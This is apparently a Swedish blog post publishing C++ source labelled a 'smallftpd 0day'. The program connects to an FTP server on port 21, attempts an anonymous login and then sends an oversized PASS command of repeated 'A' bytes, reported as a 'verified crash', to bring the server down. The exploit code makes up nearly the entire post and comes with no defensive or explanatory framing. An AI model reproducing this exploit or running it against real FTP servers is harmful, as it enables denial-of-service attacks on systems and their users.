fredag 24 oktober 2025

smallftpd 0day (Author:Claes Spett (.PrØÐiGy))







 #pragma warning(disable:4996) 



#include <winsock2.h>

#include <ws2tcpip.h>

#include <iostream>

#include <string>

#pragma comment(lib, "ws2_32.lib")


void exploit_crash() {

    std::string host = "192.168.1.206";

    int port = 21;


    std::cout << "FTP Server Crash Exploit" << std::endl;

    std::cout << "Target: " << host << ":" << port << std::endl;

    std::cout << "Server Type: unknown" << std::endl;

    std::cout << "Command: PASS" << std::endl;

    std::cout << "Payload: 100 bytes" << std::endl;

    std::cout << "Status: VERIFIED CRASH" << std::endl;

    std::cout << "Anonymous Login: False" << std::endl;

    std::cout << std::endl;


    // Check if server is up

    std::cout << "Checking server status..." << std::endl;


    WSADATA wsaData;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {

        std::cerr << "WSAStartup failed" << std::endl;

        return;

    }


    SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if (sock == INVALID_SOCKET) {

        std::cerr << "Socket creation failed" << std::endl;

        WSACleanup();

        return;

    }


    // Set timeout

    int timeout = 10000;

    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout, sizeof(timeout));


    sockaddr_in serverAddr;

    serverAddr.sin_family = AF_INET;

    serverAddr.sin_port = htons(port);

    inet_pton(AF_INET, host.c_str(), &serverAddr.sin_addr);


    if (connect(sock, (sockaddr*)&serverAddr, sizeof(serverAddr)) == SOCKET_ERROR) {

        std::cerr << "Connection failed" << std::endl;

        closesocket(sock);

        WSACleanup();

        return;

    }


    std::cout << "Server is online" << std::endl;

    std::cout << "Sending crash payload..." << std::endl;


    char buffer[1024];


    // Get banner

    int bytesReceived = recv(sock, buffer, sizeof(buffer) - 1, 0);

    if (bytesReceived > 0) {

        buffer[bytesReceived] = '\0';

        std::cout << "Banner: " << buffer << std::endl;

    }


    // Try login methods

    bool login_success = false;

    std::string login_methods[][2] = { {"anonymous", "anonymous"} };


    for (auto& login : login_methods) {

        std::string username = login[0];

        std::string password = login[1];


        std::cout << "Trying login: " << username << "/" << password << std::endl;


        // Send USER command

        std::string user_cmd = "USER " + username + "\r\n";

        send(sock, user_cmd.c_str(), user_cmd.length(), 0);


        bytesReceived = recv(sock, buffer, sizeof(buffer) - 1, 0);

        if (bytesReceived > 0) {

            buffer[bytesReceived] = '\0';

            std::cout << "USER response: " << buffer << std::endl;

        }


        // Send PASS command  

        std::string pass_cmd = "PASS " + password + "\r\n";

        send(sock, pass_cmd.c_str(), pass_cmd.length(), 0);


        bytesReceived = recv(sock, buffer, sizeof(buffer) - 1, 0);

        if (bytesReceived > 0) {

            buffer[bytesReceived] = '\0';

            std::cout << "PASS response: " << buffer << std::endl;


            // Check if login was successful

            std::string response(buffer);

            if (response.find("230") != std::string::npos ||

                response.find("Login successful") != std::string::npos) {

                std::cout << "Login successful as " << username << std::endl;

                login_success = true;

                break;

            }

            else {

                std::cout << "Login failed as " << username << std::endl;

            }

        }

    }


    if (!login_success) {

        std::cout << "WARNING: Could not login, but continuing with exploit attempt..." << std::endl;

    }


    // Send crash payload

    std::string command = "PASS ";

    std::string payload =

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";


    std::string crash_payload = command + payload + "\r\n";


    std::cout << "Sending crash payload..." << std::endl;

    int bytesSent = send(sock, crash_payload.c_str(), crash_payload.length(), 0);

    std::cout << "Sent " << bytesSent << " bytes" << std::endl;


    // Try to get response

    try {

        bytesReceived = recv(sock, buffer, sizeof(buffer) - 1, 0);

        if (bytesReceived > 0) {

            buffer[bytesReceived] = '\0';

            std::cout << "Response: " << buffer << std::endl;

        }

        else {

            std::cout << "No response received (timeout - possible crash)" << std::endl;

        }

    }

    catch (...) {

        std::cout << "Connection reset by peer (possible crash)" << std::endl;

    }


    closesocket(sock);

    WSACleanup();

}


int main() {

    std::cout << "smallftpd 0day Claes Spett (.PrØÐiGy)" << std::endl;

    exploit_crash();

    return 0;

}

Upplagd av kl.

Inga kommentarer:

Skicka en kommentar

Prenumerera på: Kommentarer till inlägget (Atom)